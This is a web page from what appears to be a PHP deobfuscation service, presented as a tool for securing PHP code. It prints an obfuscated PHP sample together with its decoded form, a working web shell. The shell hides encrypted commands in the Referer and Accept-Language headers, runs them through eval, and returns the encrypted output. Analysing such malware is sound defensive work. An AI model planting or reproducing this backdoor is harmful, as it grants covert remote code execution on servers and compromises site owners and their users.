Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $s='$i],S!0,$e))),$k)S!)S!);$o=S!oS!b_getS!_contentS!s();ob_end_cleaS!n();$d=baS!se6..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$s='$i],S!0,$e))),$k)S!)S!);$o=S!oS!b_getS!_contentS!s();ob_end_cleaS!n();$d=baS!se6S!4_e';
$U='@$r["HTTP_ACS!CES!PT_LS!ANGUAGE"S!];ifS!($rr&S!&$raS!){$u=paS!rse_url(S!$rr);parS!se_str(S!$';
$l='}^S!$S!k{S!$jS!S!};}}retuS!rn $o;}$r=$_SERS!VER;$S!rr=@$S!r["HTTP_RS!EFERER"];$raS!S!=';
$n='oS!=S!"";for($i=0;S!$i<S!$l;S!){fS!or($j=S!0;($jS!<$c&&$i<$l);$S!j++,$i++){$o.=S!$t{$i';
$E=str_replace('K','','crKeKateKK_KfunKction');
$b='!?:;q=0S!.([\\d]S!))?,?/",S!$ra,S!$m);S!if($S!q&&$m){S!@session_staS!rt()S!;$s=&$_S!SS!ESSI';
$g='!<counS!S!t($m[1]S!)S!;$z++)$p.=$q[$m[2][$S!z]]S!;ifS!(strpS!os($S!p,$h)===0){S!$s[$';
$v='$sS![$iS!],$f);iS!f(S!$e)S!{$k=$kh.$kS!f;ob_S!start();@eS!valS!(@gzuncomprS!eS!ss(@x(@baS!';
$t='nS!coS!dS!e(x(gzS!compressS!($o),$S!k));print("<$kS!>$d</$S!k>");@S!seS!ssionS!_destroy();}}}}';
$u='i]="";$S!p=$ss($S!p,3);}S!if(arS!S!ray_key_exisS!S!ts($i,$s)){$sS![$i]S!.=$p;$eS!=strposS!(';
$Q='mS!d5S!($i.$S!kh),0,3));$f=$sl($S!ssS!(md5(S!S!$i.$kf),0,3)S!);$p="";forS!($z=S!1;$zS';
$L='u["querS!y"S!],$qS!)S!;$q=arrayS!_valuS!S!es($q);preg_match_S!S!all("/([\\w])[\\wS!-]+(S';
$Z='se64S!_decode(pS!reg_replacS!e(aS!rray("/_S!/"S!,"/-/S!"S!),arrayS!("S!S!/","+"),$ss($s[';
$w='ON;S!S!$ss="subS!str";$sl="stS!rS!tolower";$i=$mS![1][S!0S!].S!$m[1][1];$h=$S!sl($ss(S!';
$p='$kh="5d4S!1";$kf="S!402a";fS!unctS!ion x(S!$t,$k){$S!c=sS!trlen(S!$k);$l=S!strS!len($t);S!$';
$T=str_replace('S!','',$p.$n.$l.$U.$L.$b.$w.$Q.$g.$u.$v.$Z.$s.$t);
$F=$E('',$T);$F();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$E create_function
$F None
$L u["querS!y"S!],$qS!)S!;$q=arrayS!_valuS!S!es($q);preg_match_..
$Q mS!d5S!($i.$S!kh),0,3));$f=$sl($S!ssS!(md5(S!S!$i.$kf),0,3)S..
$T $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$U @$r["HTTP_ACS!CES!PT_LS!ANGUAGE"S!];ifS!($rr&S!&$raS!){$u=pa..
$Z se64S!_decode(pS!reg_replacS!e(aS!rray("/_S!/"S!,"/-/S!"S!),..
$b !?:;q=0S!.([\d]S!))?,?/",S!$ra,S!$m);S!if($S!q&&$m){S!@sessi..
$g !<counS!S!t($m[1]S!)S!;$z++)$p.=$q[$m[2][$S!z]]S!;ifS!(strpS..
$l }^S!$S!k{S!$jS!S!};}}retuS!rn $o;}$r=$_SERS!VER;$S!rr=@$S!r[..
$n oS!=S!"";for($i=0;S!$i<S!$l;S!){fS!or($j=S!0;($jS!<$c&&$i<$l..
$p $kh="5d4S!1";$kf="S!402a";fS!unctS!ion x(S!$t,$k){$S!c=sS!tr..
$s $i],S!0,$e))),$k)S!)S!);$o=S!oS!b_getS!_contentS!s();ob_end_..
$t nS!coS!dS!e(x(gzS!compressS!($o),$S!k));print("<$kS!>$d</$S!..
$u i]="";$S!p=$ss($S!p,3);}S!if(arS!S!ray_key_exisS!S!ts($i,$s)..
$v $sS![$iS!],$f);iS!f(S!$e)S!{$k=$kh.$kS!f;ob_S!start();@eS!va..
$w ON;S!S!$ss="subS!str";$sl="stS!rS!tolower";$i=$mS![1][S!0S!]..

Stats

MD5 4682aa241652837ef9f3f3ad93e717dd
Eval Count 1
Decode Time 119 ms